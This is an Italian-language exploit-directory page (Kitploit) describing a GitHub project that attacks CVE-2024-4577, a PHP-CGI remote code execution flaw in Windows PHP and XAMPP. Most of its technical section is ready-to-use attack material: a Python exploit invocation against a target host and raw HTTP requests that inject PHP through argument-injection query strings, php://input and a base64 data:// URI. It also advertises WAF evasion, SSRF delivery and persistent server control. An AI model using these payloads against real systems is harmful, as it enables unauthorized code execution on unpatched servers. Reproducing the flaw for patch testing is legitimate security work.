Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-4577-PHP-RCE — [Riproduzione di vulnerabilità] Il primo exploit al mondo che sfrutta l'ambiente PHP predefinito (XAMPP) per la vulnerabilità CVE-2024-4577 PHP-CGI RCE. | Kitploit
Strumenti/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebBypass WAFPenetration TestingSviluppo Payload
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[Riproduzione di vulnerabilità] Il primo exploit al mondo che sfrutta l'ambiente PHP predefinito (XAMPP) per la vulnerabilità CVE-2024-4577 PHP-CGI RCE.

Vedi Repository
162332 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-4577-PHP-RCE

Descrizione del progetto e principio

  • Il primo EXP al mondo per la vulnerabilità CVE-2024-4577 PHP-CGI RCE utilizzando l'ambiente PHP predefinito (XAMPP).
  • Il primo exploit al mondo per CVE-2024-4577 PHP-CGI RCE che sfrutta l'ambiente PHP predefinito. Condivide l'exploit originale, supporta SSRF, supporta il bypass WAF.
  • Realizza RCE nell'ambiente PHP predefinito. Principio: cgi.force_redirect + REDIRECT-STATUS.
  • Nuovo EXP originale, supporta attacchi in scenari con bypass WAF. Principio: creazione di un server FastCGI + comunicazione tramite protocollo FastCGI.
  • Nuovo EXP originale, supporta attacchi in scenari SSRF. Principio: protocollo data:// + richiesta GET.

Vantaggi di EXP 1

  • RCE senza bisogno di allow_url_include, auto_prepend_file, auto_append_file. Può includere qualsiasi file e file PHP.
  • Non vengono utilizzate le parole chiave allow_url_include, auto_prepend_file, auto_append_file spesso bloccate dai WAF.
  • Tutte le comunicazioni del server FastCGI non vengono registrate dal WAF.
  • Ascolta su una nuova porta, quindi realizza un controllo persistente del server PHP, indipendente da Apache e PHP.

Introduzione alla vulnerabilità

InformazioneContenuto
Nome vulnerabilitàPHP RCE
ID vulnerabilitàCVE-2024-4577
Livello di rischioAlto

Versioni interessate

  • PHP Windows 8.3.0 <= versione interessata < 8.3.8
  • PHP Windows 8.2.0 <= versione interessata < 8.2.20
  • PHP Windows 8.1.0 <= versione interessata < 8.1.29
  • PHP Windows versione interessata == 8.0.x
  • PHP Windows versione interessata == 7.x
  • PHP Windows versione interessata == 5.x
  • XAMPP Windows 8.2.0 <= versione interessata <= 8.2.12
  • XAMPP Windows 8.1.0 <= versione interessata <= 8.1.25
  • XAMPP Windows versione interessata == 8.0.x
  • XAMPP Windows versione interessata == 7.x
  • XAMPP Windows versione interessata == 5.x

EXP 1

Utilizzabile per scenari con bypass WAF + scenario predefinito:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

Esempio:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

Utilizzabile per scenari SSRF + scenario predefinito:

root@kitploit:~
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

Utilizzabile per lo scenario predefinito:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

Utilizzabile per lo scenario predefinito:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

Riproduzione

  1. Ambiente server:
root@kitploit:~
XAMPP Windows versione 8.2.12
  1. Scaricare e installare XAMPP sul server:
root@kitploit:~
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

Oppure scegliere autonomamente le versioni interessate qui: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
  1. Configurazione del server
root@kitploit:~
Nessuna modifica necessaria, mantenere la configurazione predefinita
  1. Utilizzo dell'EXP sul client
root@kitploit:~
Testare utilizzando gli EXP sopra indicati
  1. Verifica
root@kitploit:~
Osservare se viene restituita la stringa "TesT" o il contenuto del file system.ini del server
Scarica lo strumento
Tipo di vulnerabilità
RCE
Difficoltà di sfruttamentoBassa